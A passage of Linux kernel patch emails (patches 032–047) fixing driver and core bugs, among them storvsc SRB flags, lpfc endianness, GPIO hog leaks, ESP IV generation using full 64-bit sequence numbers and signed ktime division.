drivers/net/wireless/ath/ath10k/wmi.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/wmi.c b/drivers/net/wireless/ath/ath10k/wmi.c index ebaa096cf200..0fabe689179c 100644 --- a/drivers/net/wireless/ath/ath10k/wmi.c +++ b/drivers/net/wireless/ath/ath10k/wmi.c @@ -1645,10 +1645,10 @@ void ath10k_wmi_event_chan_info(struct ath10k *ar, struct sk_buff *skb) survey = &ar->survey[idx]; survey->time = WMI_CHAN_INFO_MSEC(cycle_count); - survey->time_rx = WMI_CHAN_INFO_MSEC(rx_clear_count); + survey->time_busy = WMI_CHAN_INFO_MSEC(rx_clear_count); survey->noise = noise_floor; survey->filled = SURVEY_INFO_TIME | - SURVEY_INFO_TIME_RX | + SURVEY_INFO_TIME_BUSY | SURVEY_INFO_NOISE_DBM; } From dc45708ca9988656d706940df5fd102672c5de92 Mon Sep 17 00:00:00 2001 From: "K. Y. Srinivasan" Date: Fri, 1 May 2015 11:03:02 -0700 Subject: [PATCH 032/872] storvsc: Set the SRB flags correctly when no data transfer is needed Set the SRB flags correctly when there is no data transfer. Without this change some IHV drivers will fail valid commands such as TEST_UNIT_READY. Cc: Signed-off-by: K. Y. 
Srinivasan Reviewed-by: Long Li Signed-off-by: James Bottomley --- drivers/scsi/storvsc_drv.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c index d9dad90344d5..3c6584ff65c1 100644 --- a/drivers/scsi/storvsc_drv.c +++ b/drivers/scsi/storvsc_drv.c @@ -1600,8 +1600,7 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd) break; default: vm_srb->data_in = UNKNOWN_TYPE; - vm_srb->win8_extension.srb_flags |= (SRB_FLAGS_DATA_IN | - SRB_FLAGS_DATA_OUT); + vm_srb->win8_extension.srb_flags |= SRB_FLAGS_NO_DATA_TRANSFER; break; } From 8b2564ec7410928639db5c09a34d7d8330f1d759 Mon Sep 17 00:00:00 2001 From: Alexey Kardashevskiy Date: Tue, 28 Apr 2015 18:26:22 +1000 Subject: [PATCH 033/872] lpfc: Fix breakage on big endian kernels This reverts 4fbdf9cb it breaks LPFC on POWER7 machine, big endian kernel. Without this, the kernel enters an infinite oops loop. This is the hardware used for verification: 0005:01:00.0 Fibre Channel [0c04]: Emulex Corporation Saturn-X: LightPulse Fibre Channel Host Adapter [10df:f100] (rev 03) 0005:01:00.1 Fibre Channel [0c04]: Emulex Corporation Saturn-X: LightPulse Fibre Channel Host Adapter [10df:f100] (rev 03) Signed-off-by: Alexey Kardashevskiy Reviewed-by: James Smart Signed-off-by: James Bottomley --- drivers/scsi/lpfc/lpfc_scsi.c | 41 ++++++++++++++++++----------------- 1 file changed, 21 insertions(+), 20 deletions(-) diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c index cb73cf9e9ba5..c140f99772ca 100644 --- a/drivers/scsi/lpfc/lpfc_scsi.c +++ b/drivers/scsi/lpfc/lpfc_scsi.c @@ -1129,25 +1129,6 @@ lpfc_release_scsi_buf(struct lpfc_hba *phba, struct lpfc_scsi_buf *psb) phba->lpfc_release_scsi_buf(phba, psb); } -/** - * lpfc_fcpcmd_to_iocb - copy the fcp_cmd data into the IOCB - * @data: A pointer to the immediate command data portion of the IOCB. - * @fcp_cmnd: The FCP Command that is provided by the SCSI layer. - * - * The routine copies the entire FCP command from @fcp_cmnd to @data while - * byte swapping the data to big endian format for transmission on the wire. - **/ -static void -lpfc_fcpcmd_to_iocb(uint8_t *data, struct fcp_cmnd *fcp_cmnd) -{ - int i, j; - - for (i = 0, j = 0; i < sizeof(struct fcp_cmnd); - i += sizeof(uint32_t), j++) { - ((uint32_t *)data)[j] = cpu_to_be32(((uint32_t *)fcp_cmnd)[j]); - } -} - /** * lpfc_scsi_prep_dma_buf_s3 - DMA mapping for scsi buffer to SLI3 IF spec * @phba: The Hba for which this call is being executed. @@ -1283,7 +1264,6 @@ lpfc_scsi_prep_dma_buf_s3(struct lpfc_hba *phba, struct lpfc_scsi_buf *lpfc_cmd) * we need to set word 4 of IOCB here */ iocb_cmd->un.fcpi.fcpi_parm = scsi_bufflen(scsi_cmnd); - lpfc_fcpcmd_to_iocb(iocb_cmd->unsli3.fcp_ext.icd, fcp_cmnd); return 0; } @@ -4146,6 +4126,24 @@ lpfc_scsi_cmd_iocb_cmpl(struct lpfc_hba *phba, struct lpfc_iocbq *pIocbIn, lpfc_release_scsi_buf(phba, lpfc_cmd); } +/** + * lpfc_fcpcmd_to_iocb - copy the fcp_cmd data into the IOCB + * @data: A pointer to the immediate command data portion of the IOCB. + * @fcp_cmnd: The FCP Command that is provided by the SCSI layer. + * + * The routine copies the entire FCP command from @fcp_cmnd to @data while + * byte swapping the data to big endian format for transmission on the wire. 
+ **/ +static void +lpfc_fcpcmd_to_iocb(uint8_t *data, struct fcp_cmnd *fcp_cmnd) +{ + int i, j; + for (i = 0, j = 0; i < sizeof(struct fcp_cmnd); + i += sizeof(uint32_t), j++) { + ((uint32_t *)data)[j] = cpu_to_be32(((uint32_t *)fcp_cmnd)[j]); + } +} + /** * lpfc_scsi_prep_cmnd - Wrapper func for convert scsi cmnd to FCP info unit * @vport: The virtual port for which this call is being executed. @@ -4225,6 +4223,9 @@ lpfc_scsi_prep_cmnd(struct lpfc_vport *vport, struct lpfc_scsi_buf *lpfc_cmd, fcp_cmnd->fcpCntl3 = 0; phba->fc4ControlRequests++; } + if (phba->sli_rev == 3 && + !(phba->sli3_options & LPFC_SLI3_BG_ENABLED)) + lpfc_fcpcmd_to_iocb(iocb_cmd->unsli3.fcp_ext.icd, fcp_cmnd); /* * Finish initializing those IOCB fields that are independent * of the scsi_cmnd request_buffer From 6d86750ce62391f5a0a7985d5c050c2e3c823ab9 Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Mon, 4 May 2015 17:23:25 +0200 Subject: [PATCH 034/872] gpio: fix gpio leak in gpiochip_add error path Make sure to free any hogged gpios on errors in gpiochip_add. Also move all forward declarations to the top of the file. Fixes: f625d4601759 ("gpio: add GPIO hogging mechanism") Signed-off-by: Johan Hovold Reviewed-by: Alexandre Courbot Signed-off-by: Linus Walleij --- drivers/gpio/gpiolib.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c index 59eaa23767d8..6bc612b8a49f 100644 --- a/drivers/gpio/gpiolib.c +++ b/drivers/gpio/gpiolib.c @@ -53,6 +53,11 @@ static DEFINE_MUTEX(gpio_lookup_lock); static LIST_HEAD(gpio_lookup_list); LIST_HEAD(gpio_chips); + +static void gpiochip_free_hogs(struct gpio_chip *chip); +static void gpiochip_irqchip_remove(struct gpio_chip *gpiochip); + + static inline void desc_set_label(struct gpio_desc *d, const char *label) { d->label = label; @@ -297,6 +302,7 @@ int gpiochip_add(struct gpio_chip *chip) err_remove_chip: acpi_gpiochip_remove(chip); + gpiochip_free_hogs(chip); of_gpiochip_remove(chip); spin_lock_irqsave(&gpio_lock, flags); list_del(&chip->list); @@ -313,10 +319,6 @@ int gpiochip_add(struct gpio_chip *chip) } EXPORT_SYMBOL_GPL(gpiochip_add); -/* Forward-declaration */ -static void gpiochip_irqchip_remove(struct gpio_chip *gpiochip); -static void gpiochip_free_hogs(struct gpio_chip *chip); - /** * gpiochip_remove() - unregister a gpio_chip * @chip: the chip to unregister From f230e8ffc03f17bd9d6b90ea890b8252a8cc1821 Mon Sep 17 00:00:00 2001 From: Michael Brunner Date: Mon, 11 May 2015 12:46:49 +0200 Subject: [PATCH 035/872] gpio: gpio-kempld: Fix get_direction return value This patch fixes an inverted return value of the gpio get_direction function. The wrong value causes the direction sysfs entry and GPIO debugfs file to indicate incorrect GPIO direction settings. In some cases it also prevents setting GPIO output values. The problem is also present in all other stable kernel versions since linux-3.12. 
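A stand-alone sketch of the inversion being fixed, assuming the KEMPLD direction bit reads 1 when a pin is configured as an output while gpiolib expects get_direction() to return 1 for an input; the register value and pin numbers are made up for illustration:

#include <stdio.h>

/* Returns 1 for input, 0 for output, as gpiolib expects.  Returning the
 * raw register bit (the old code) reports every pin backwards. */
static int get_direction(unsigned int dir_reg, unsigned int offset)
{
	return !((dir_reg >> offset) & 1);
}

int main(void)
{
	unsigned int dir_reg = 0x02;    /* pin 1 set as output in hardware */

	printf("pin 0 -> %s\n", get_direction(dir_reg, 0) ? "in" : "out");
	printf("pin 1 -> %s\n", get_direction(dir_reg, 1) ? "in" : "out");
	return 0;
}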
Cc: Stable # v3.12+ Reported-by: Jochen Henneberg Signed-off-by: Michael Brunner Reviewed-by: Guenter Roeck Signed-off-by: Linus Walleij --- drivers/gpio/gpio-kempld.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpio/gpio-kempld.c b/drivers/gpio/gpio-kempld.c index 6b8115f34208..83f281dda1e0 100644 --- a/drivers/gpio/gpio-kempld.c +++ b/drivers/gpio/gpio-kempld.c @@ -117,7 +117,7 @@ static int kempld_gpio_get_direction(struct gpio_chip *chip, unsigned offset) = container_of(chip, struct kempld_gpio_data, chip); struct kempld_device_data *pld = gpio->pld; - return kempld_gpio_get_bit(pld, KEMPLD_GPIO_DIR_NUM(offset), offset); + return !kempld_gpio_get_bit(pld, KEMPLD_GPIO_DIR_NUM(offset), offset); } static int kempld_gpio_pincount(struct kempld_device_data *pld) From e6c906dedb8a332ece0e789980eef340fdcd9e20 Mon Sep 17 00:00:00 2001 From: Mika Westerberg Date: Tue, 12 May 2015 13:35:37 +0300 Subject: [PATCH 036/872] pinctrl: cherryview: Read triggering type from HW if not set when requested If a driver does not set interrupt triggering type when it calls request_irq(), it means use the pin as the hardware/firmware has configured it. There are some drivers doing this. One example is drivers/input/serio/i8042.c that requests the interrupt like: error = request_irq(I8042_KBD_IRQ, i8042_interrupt, IRQF_SHARED, "i8042", i8042_platform_device); It assumes the interrupt is already properly configured. This is true in case of interrupts connected to the IO-APIC. However, some Intel Braswell/Cherryview based machines use a GPIO here instead for the internal keyboard controller. This is a problem because even if the pin/interrupt is properly configured, the irqchip ->irq_set_type() will never be called as the triggering flags are 0. Because of that we do not have correct interrupt flow handler set for the interrupt. Fix this by adding a custom ->irq_startup() that checks if the interrupt has no triggering type set and in that case read the type directly from the hardware and install correct flow handler along with the mapping. Reported-by: Jagadish Krishnamoorthy Reported-by: Freddy Paul Signed-off-by: Mika Westerberg Signed-off-by: Linus Walleij --- drivers/pinctrl/intel/pinctrl-cherryview.c | 44 ++++++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/drivers/pinctrl/intel/pinctrl-cherryview.c b/drivers/pinctrl/intel/pinctrl-cherryview.c index 82f691eeeec4..732ff757a95f 100644 --- a/drivers/pinctrl/intel/pinctrl-cherryview.c +++ b/drivers/pinctrl/intel/pinctrl-cherryview.c @@ -1292,6 +1292,49 @@ static void chv_gpio_irq_unmask(struct irq_data *d) chv_gpio_irq_mask_unmask(d, false); } +static unsigned chv_gpio_irq_startup(struct irq_data *d) +{ + /* + * Check if the interrupt has been requested with 0 as triggering + * type. In that case it is assumed that the current values + * programmed to the hardware are used (e.g BIOS configured + * defaults). + * + * In that case ->irq_set_type() will never be called so we need to + * read back the values from hardware now, set correct flow handler + * and update mappings before the interrupt is being used. 
+ */ + if (irqd_get_trigger_type(d) == IRQ_TYPE_NONE) { + struct gpio_chip *gc = irq_data_get_irq_chip_data(d); + struct chv_pinctrl *pctrl = gpiochip_to_pinctrl(gc); + unsigned offset = irqd_to_hwirq(d); + int pin = chv_gpio_offset_to_pin(pctrl, offset); + irq_flow_handler_t handler; + unsigned long flags; + u32 intsel, value; + + intsel = readl(chv_padreg(pctrl, pin, CHV_PADCTRL0)); + intsel &= CHV_PADCTRL0_INTSEL_MASK; + intsel >>= CHV_PADCTRL0_INTSEL_SHIFT; + + value = readl(chv_padreg(pctrl, pin, CHV_PADCTRL1)); + if (value & CHV_PADCTRL1_INTWAKECFG_LEVEL) + handler = handle_level_irq; + else + handler = handle_edge_irq; + + spin_lock_irqsave(&pctrl->lock, flags); + if (!pctrl->intr_lines[intsel]) { + __irq_set_handler_locked(d->irq, handler); + pctrl->intr_lines[intsel] = offset; + } + spin_unlock_irqrestore(&pctrl->lock, flags); + } + + chv_gpio_irq_unmask(d); + return 0; +} + static int chv_gpio_irq_type(struct irq_data *d, unsigned type) { struct gpio_chip *gc = irq_data_get_irq_chip_data(d); @@ -1357,6 +1400,7 @@ static int chv_gpio_irq_type(struct irq_data *d, unsigned type) static struct irq_chip chv_gpio_irqchip = { .name = "chv-gpio", + .irq_startup = chv_gpio_irq_startup, .irq_ack = chv_gpio_irq_ack, .irq_mask = chv_gpio_irq_mask, .irq_unmask = chv_gpio_irq_unmask, From 4d051f74cbb270310d1af3f56d4c83801d8bedc8 Mon Sep 17 00:00:00 2001 From: Stephen Boyd Date: Fri, 10 Apr 2015 16:11:04 -0700 Subject: [PATCH 037/872] phy: qcom-ufs: Switch dependency to ARCH_QCOM This phy only exists on platforms under ARCH_QCOM, not ARCH_MSM. Cc: Yaniv Gardi Cc: Dov Levenglick Cc: Christoph Hellwig Cc: David Brown Cc: Bryan Huntsman Cc: Daniel Walker Signed-off-by: Stephen Boyd Reviewed-by: Yaniv Gardi Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/Kconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/phy/Kconfig b/drivers/phy/Kconfig index a53bd5b52df9..33e703eec87b 100644 --- a/drivers/phy/Kconfig +++ b/drivers/phy/Kconfig @@ -304,7 +304,7 @@ config PHY_STIH41X_USB config PHY_QCOM_UFS tristate "Qualcomm UFS PHY driver" - depends on OF && ARCH_MSM + depends on OF && ARCH_QCOM select GENERIC_PHY help Support for UFS PHY on QCOM chipsets. From 7f7a4d306ff87502dc26860f54e798693cf9b1e1 Mon Sep 17 00:00:00 2001 From: Felipe Balbi Date: Tue, 28 Apr 2015 11:13:15 -0500 Subject: [PATCH 038/872] phy: fix Kconfig dependencies DM816x PHY uses usb_phy_* methods and because of that, it must select USB_PHY, however, because the drivers in question (DM816x, TWL4030 and OMAP_USB2) sit outside of drivers/usb/ directory, meaning they can be built even if USB_SUPPORT=n. This patches fixes the dependencies by adding USB_SUPPORT as a dependency and making all drivers select USB_PHY (which cannot be selected through menuconfig). Note that this fixes some linking breakages when building with randconfig. Cc: Tony Lindgren Cc: Kishon Vijay Abraham I Acked-by: Tony Lindgren Signed-off-by: Felipe Balbi Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/Kconfig | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/drivers/phy/Kconfig b/drivers/phy/Kconfig index 33e703eec87b..fc9b9f0ea91e 100644 --- a/drivers/phy/Kconfig +++ b/drivers/phy/Kconfig @@ -38,7 +38,9 @@ config ARMADA375_USBCLUSTER_PHY config PHY_DM816X_USB tristate "TI dm816x USB PHY driver" depends on ARCH_OMAP2PLUS + depends on USB_SUPPORT select GENERIC_PHY + select USB_PHY help Enable this for dm816x USB to work. 
@@ -97,8 +99,9 @@ config OMAP_CONTROL_PHY config OMAP_USB2 tristate "OMAP USB2 PHY Driver" depends on ARCH_OMAP2PLUS - depends on USB_PHY + depends on USB_SUPPORT select GENERIC_PHY + select USB_PHY select OMAP_CONTROL_PHY depends on OMAP_OCP2SCP help @@ -122,8 +125,9 @@ config TI_PIPE3 config TWL4030_USB tristate "TWL4030 USB Transceiver Driver" depends on TWL4030_CORE && REGULATOR_TWL4030 && USB_MUSB_OMAP2PLUS - depends on USB_PHY + depends on USB_SUPPORT select GENERIC_PHY + select USB_PHY help Enable this to support the USB OTG transceiver on TWL4030 family chips (including the TWL5030 and TPS659x0 devices). From 4581f798ec7373bea4530b7e57e6c6842f132bbd Mon Sep 17 00:00:00 2001 From: Kishon Vijay Abraham I Date: Mon, 4 May 2015 22:07:33 +0530 Subject: [PATCH 039/872] phy: omap-usb2: invoke pm_runtime_disable on error path if devm_clk_get for wkupclk fails, there will be an unbalanced pm_runtime_enable. Fix it here. Reported-by: Benoit Parrot Cc: Roger Quadros Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/phy-omap-usb2.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/phy/phy-omap-usb2.c b/drivers/phy/phy-omap-usb2.c index 183ef4368101..c1a468686bdc 100644 --- a/drivers/phy/phy-omap-usb2.c +++ b/drivers/phy/phy-omap-usb2.c @@ -275,6 +275,7 @@ static int omap_usb2_probe(struct platform_device *pdev) phy->wkupclk = devm_clk_get(phy->dev, "usb_phy_cm_clk32k"); if (IS_ERR(phy->wkupclk)) { dev_err(&pdev->dev, "unable to get usb_phy_cm_clk32k\n"); + pm_runtime_disable(phy->dev); return PTR_ERR(phy->wkupclk); } else { dev_warn(&pdev->dev, From a3ac3d4a296ac88578c3a982d044e53284d85344 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Thu, 2 Apr 2015 17:01:11 +0900 Subject: [PATCH 040/872] phy: phy-rcar-gen2: Fix USBHS_UGSTS_LOCK value According to the technical update (No. TN-RCS-B011A/E), the UGSTS LOCK bit location is bit 8, not bits 1 and 0. It also says that the register address offset of UGSTS is 0x88, not 0x90. So, this patch fixes the USBHS_UGSTS_LOCK value and some comments. Signed-off-by: Yoshihiro Shimoda Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/phy-rcar-gen2.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/phy/phy-rcar-gen2.c b/drivers/phy/phy-rcar-gen2.c index 778276aba3aa..97d45f47d1ad 100644 --- a/drivers/phy/phy-rcar-gen2.c +++ b/drivers/phy/phy-rcar-gen2.c @@ -23,7 +23,7 @@ #define USBHS_LPSTS 0x02 #define USBHS_UGCTRL 0x80 #define USBHS_UGCTRL2 0x84 -#define USBHS_UGSTS 0x88 /* The manuals have 0x90 */ +#define USBHS_UGSTS 0x88 /* From technical update */ /* Low Power Status register (LPSTS) */ #define USBHS_LPSTS_SUSPM 0x4000 @@ -41,7 +41,7 @@ #define USBHS_UGCTRL2_USB0SEL_HS_USB 0x00000030 /* USB General status register (UGSTS) */ -#define USBHS_UGSTS_LOCK 0x00000300 /* The manuals have 0x3 */ +#define USBHS_UGSTS_LOCK 0x00000100 /* From technical update */ #define PHYS_PER_CHANNEL 2 From 3e59ae4aa28237ced95413fbd46004b57c4da095 Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Fri, 8 May 2015 08:50:11 +0800 Subject: [PATCH 041/872] i2c: hix5hd2: Fix modalias to make module auto-loading work Make the modalias match driver name, this is required to make module auto-loading work. 
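For background on why the exact string matters, here is a minimal sketch with an illustrative driver name (nothing below is taken from the hix5hd2 driver): the platform bus matches devices to drivers by name and emits a MODALIAS uevent of the form "platform:<name>", so the alias compiled into the module must use the same name as the platform_driver or modprobe never finds the module:

	#include <linux/module.h>
	#include <linux/platform_device.h>

	static int example_i2c_probe(struct platform_device *pdev)
	{
		return 0;	/* stub for the sketch */
	}

	static struct platform_driver example_i2c_driver = {
		.probe	= example_i2c_probe,
		.driver	= {
			.name	= "example-i2c", /* uevent: MODALIAS=platform:example-i2c */
		},
	};
	module_platform_driver(example_i2c_driver);

	/* Must match .driver.name exactly for auto-loading to work. */
	MODULE_ALIAS("platform:example-i2c");
	MODULE_LICENSE("GPL");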
Signed-off-by: Axel Lin Acked-by: Zhangfei Gao Signed-off-by: Wolfram Sang Cc: stable@kernel.org --- drivers/i2c/busses/i2c-hix5hd2.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/i2c/busses/i2c-hix5hd2.c b/drivers/i2c/busses/i2c-hix5hd2.c index 8fe78d08e01c..7c6966434ee7 100644 --- a/drivers/i2c/busses/i2c-hix5hd2.c +++ b/drivers/i2c/busses/i2c-hix5hd2.c @@ -554,4 +554,4 @@ module_platform_driver(hix5hd2_i2c_driver); MODULE_DESCRIPTION("Hix5hd2 I2C Bus driver"); MODULE_AUTHOR("Wei Yan "); MODULE_LICENSE("GPL"); -MODULE_ALIAS("platform:i2c-hix5hd2"); +MODULE_ALIAS("platform:hix5hd2-i2c"); From 8d487a43c36b54a029d74ad3b0a6a9d1253e728a Mon Sep 17 00:00:00 2001 From: Vasily Khoruzhick Date: Sun, 3 May 2015 21:13:10 +0300 Subject: [PATCH 042/872] i2c: s3c2410: fix oops in suspend callback for non-dt platforms Initialize sysreg by default, otherwise driver will crash in suspend callback when not using DT. Signed-off-by: Vasily Khoruzhick Reviewed-by: Krzysztof Kozlowski Signed-off-by: Wolfram Sang Cc: stable@kernel.org Fixes: a7750c3ef01223 ("i2c: s3c2410: Handle i2c sys_cfg register in i2c driver") --- drivers/i2c/busses/i2c-s3c2410.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/i2c/busses/i2c-s3c2410.c b/drivers/i2c/busses/i2c-s3c2410.c index 958c8db4ec30..297e9c9ac943 100644 --- a/drivers/i2c/busses/i2c-s3c2410.c +++ b/drivers/i2c/busses/i2c-s3c2410.c @@ -1143,6 +1143,7 @@ static int s3c24xx_i2c_probe(struct platform_device *pdev) return -ENOMEM; i2c->quirks = s3c24xx_get_device_quirks(pdev); + i2c->sysreg = ERR_PTR(-ENOENT); if (pdata) memcpy(i2c->pdata, pdata, sizeof(*pdata)); else From 64aa42338e9a88c139b89797163714f0f95f3c6b Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Wed, 13 May 2015 15:26:10 +0800 Subject: [PATCH 043/872] esp4: Use high-order sequence number bits for IV generation I noticed we were only using the low-order bits for IV generation when ESN is enabled. This is very bad because it means that the IV can repeat. We must use the full 64 bits. Signed-off-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/ipv4/esp4.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c index 421a80b09b62..30b544f025ac 100644 --- a/net/ipv4/esp4.c +++ b/net/ipv4/esp4.c @@ -256,7 +256,8 @@ static int esp_output(struct xfrm_state *x, struct sk_buff *skb) aead_givcrypt_set_crypt(req, sg, sg, clen, iv); aead_givcrypt_set_assoc(req, asg, assoclen); aead_givcrypt_set_giv(req, esph->enc_data, - XFRM_SKB_CB(skb)->seq.output.low); + XFRM_SKB_CB(skb)->seq.output.low + + ((u64)XFRM_SKB_CB(skb)->seq.output.hi << 32)); ESP_SKB_CB(skb)->tmp = tmp; err = crypto_aead_givencrypt(req); From 6d7258ca937027ae86d6d5938d7ae10b6d68f4a4 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Wed, 13 May 2015 15:27:18 +0800 Subject: [PATCH 044/872] esp6: Use high-order sequence number bits for IV generation I noticed we were only using the low-order bits for IV generation when ESN is enabled. This is very bad because it means that the IV can repeat. We must use the full 64 bits. 
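Both ESP fixes use the same arithmetic; a standalone sketch (names are illustrative) of how the two 32-bit halves form the full 64-bit sequence number, and why the cast matters:

	#include <stdint.h>

	/* Combine the low and high halves of an extended sequence number.
	 * Without the 64-bit cast, "hi << 32" would shift a 32-bit value by
	 * its full width (undefined in C) and the high half would be lost --
	 * which is exactly the repeated-IV problem being fixed.
	 */
	static uint64_t esn_seq64(uint32_t lo, uint32_t hi)
	{
		return (uint64_t)lo + ((uint64_t)hi << 32);
	}

	/* e.g. esn_seq64(0x00000001, 0x00000002) == 0x0000000200000001 */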
Signed-off-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/ipv6/esp6.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c index 31f1b5d5e2ef..7c07ce36aae2 100644 --- a/net/ipv6/esp6.c +++ b/net/ipv6/esp6.c @@ -248,7 +248,8 @@ static int esp6_output(struct xfrm_state *x, struct sk_buff *skb) aead_givcrypt_set_crypt(req, sg, sg, clen, iv); aead_givcrypt_set_assoc(req, asg, assoclen); aead_givcrypt_set_giv(req, esph->enc_data, - XFRM_SKB_CB(skb)->seq.output.low); + XFRM_SKB_CB(skb)->seq.output.low + + ((u64)XFRM_SKB_CB(skb)->seq.output.hi << 32)); ESP_SKB_CB(skb)->tmp = tmp; err = crypto_aead_givencrypt(req); From f7bcb70ebae0dcdb5a2d859b09e4465784d99029 Mon Sep 17 00:00:00 2001 From: John Stultz Date: Fri, 8 May 2015 13:47:23 -0700 Subject: [PATCH 045/872] ktime: Fix ktime_divns to do signed division It was noted that the 32bit implementation of ktime_divns() was doing unsigned division and didn't properly handle negative values. And when a ktime helper was changed to utilize ktime_divns, it caused a regression on some IR blasters. See the following bugzilla for details: https://bugzilla.redhat.com/show_bug.cgi?id=1200353 This patch fixes the problem in ktime_divns by checking and preserving the sign bit, and then reapplying it if appropriate after the division, it also changes the return type to a s64 to make it more obvious this is expected. Nicolas also pointed out that negative dividers would cause infinite loops on 32bit systems, negative dividers is unlikely for users of this function, but out of caution this patch adds checks for negative dividers for both 32-bit (BUG_ON) and 64-bit(WARN_ON) versions to make sure no such use cases creep in. [ tglx: Hand an u64 to do_div() to avoid the compiler warning ] Fixes: 166afb64511e 'ktime: Sanitize ktime_to_us/ms conversion' Reported-and-tested-by: Trevor Cordes Signed-off-by: John Stultz Acked-by: Nicolas Pitre Cc: Ingo Molnar Cc: Josh Boyer Cc: One Thousand Gnomes Cc: Link: http://lkml.kernel.org/r/1431118043-23452-1-git-send-email-john.stultz@linaro.org Signed-off-by: Thomas Gleixner --- include/linux/ktime.h | 27 +++++++++++++++++++++------ kernel/time/hrtimer.c | 14 ++++++++------ 2 files changed, 29 insertions(+), 12 deletions(-) diff --git a/include/linux/ktime.h b/include/linux/ktime.h index 5fc3d1083071..2b6a204bd8d4 100644 --- a/include/linux/ktime.h +++ b/include/linux/ktime.h @@ -166,19 +166,34 @@ static inline bool ktime_before(const ktime_t cmp1, const ktime_t cmp2) } #if BITS_PER_LONG < 64 -extern u64 __ktime_divns(const ktime_t kt, s64 div); -static inline u64 ktime_divns(const ktime_t kt, s64 div) +extern s64 __ktime_divns(const ktime_t kt, s64 div); +static inline s64 ktime_divns(const ktime_t kt, s64 div) { + /* + * Negative divisors could cause an inf loop, + * so bug out here. + */ + BUG_ON(div < 0); if (__builtin_constant_p(div) && !(div >> 32)) { - u64 ns = kt.tv64; - do_div(ns, div); - return ns; + s64 ns = kt.tv64; + u64 tmp = ns < 0 ? -ns : ns; + + do_div(tmp, div); + return ns < 0 ? -tmp : tmp; } else { return __ktime_divns(kt, div); } } #else /* BITS_PER_LONG < 64 */ -# define ktime_divns(kt, div) (u64)((kt).tv64 / (div)) +static inline s64 ktime_divns(const ktime_t kt, s64 div) +{ + /* + * 32-bit implementation cannot handle negative divisors, + * so catch them on 64bit as well. 
+ */ + WARN_ON(div < 0); + return kt.tv64 / div; +} #endif static inline s64 ktime_to_us(const ktime_t kt) diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c index 76d4bd962b19..93ef7190bdea 100644 --- a/kernel/time/hrtimer.c +++ b/kernel/time/hrtimer.c @@ -266,21 +266,23 @@ lock_hrtimer_base(const struct hrtimer *timer, unsigned long *flags) /* * Divide a ktime value by a nanosecond value */ -u64 __ktime_divns(const ktime_t kt, s64 div) +s64 __ktime_divns(const ktime_t kt, s64 div) { - u64 dclc; int sft = 0; + s64 dclc; + u64 tmp; dclc = ktime_to_ns(kt); + tmp = dclc < 0 ? -dclc : dclc; + /* Make sure the divisor is less than 2^32: */ while (div >> 32) { sft++; div >>= 1; } - dclc >>= sft; - do_div(dclc, (unsigned long) div); - - return dclc; + tmp >>= sft; + do_div(tmp, (unsigned long) div); + return dclc < 0 ? -tmp : tmp; } EXPORT_SYMBOL_GPL(__ktime_divns); #endif /* BITS_PER_LONG >= 64 */ From 4541c561b6abeb52ad5d9428e4a23e037bbe2b49 Mon Sep 17 00:00:00 2001 From: Leo Yan Date: Tue, 5 May 2015 15:09:17 +0800 Subject: [PATCH 046/872] Bluetooth: btwilink: remove DEBUG define Remove the DEBUG define as the debug code; so can remove mass debug info from log buffer when using dmesg. Signed-off-by: Leo Yan Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btwilink.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/bluetooth/btwilink.c b/drivers/bluetooth/btwilink.c index 55c135b7757a..7a722df97343 100644 --- a/drivers/bluetooth/btwilink.c +++ b/drivers/bluetooth/btwilink.c @@ -22,7 +22,7 @@ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA * */ -#define DEBUG + #include #include #include From a1e85f04d8c73f885de1cca46515f66b82049231 Mon Sep 17 00:00:00 2001 From: Xinming Hu Date: Tue, 21 Apr 2015 06:59:56 -0700 Subject: [PATCH 047/872] Bluetooth: btmrvl: fix compilation warning This patch fixes a compile warnning "dump_num maybe used uninitialized in this function". Signed-off-by: Xinming Hu Signed-off-by: Amitkumar Karwar Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btmrvl_sdio.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/bluetooth/btmrvl_sdio.c b/drivers/bluetooth/btmrvl_sdio.c index 01d6da577eeb..b9a811900f6a 100644 --- a/drivers/bluetooth/btmrvl_sdio.c +++ b/drivers/bluetooth/btmrvl_sdio.c @@ -1217,7 +1217,7 @@ static void btmrvl_sdio_dump_firmware(struct btmrvl_private *priv) unsigned int reg, reg_start, reg_end; enum rdwr_status stat; u8 *dbg_ptr, *end_ptr, *fw_dump_data, *fw_dump_ptr; - 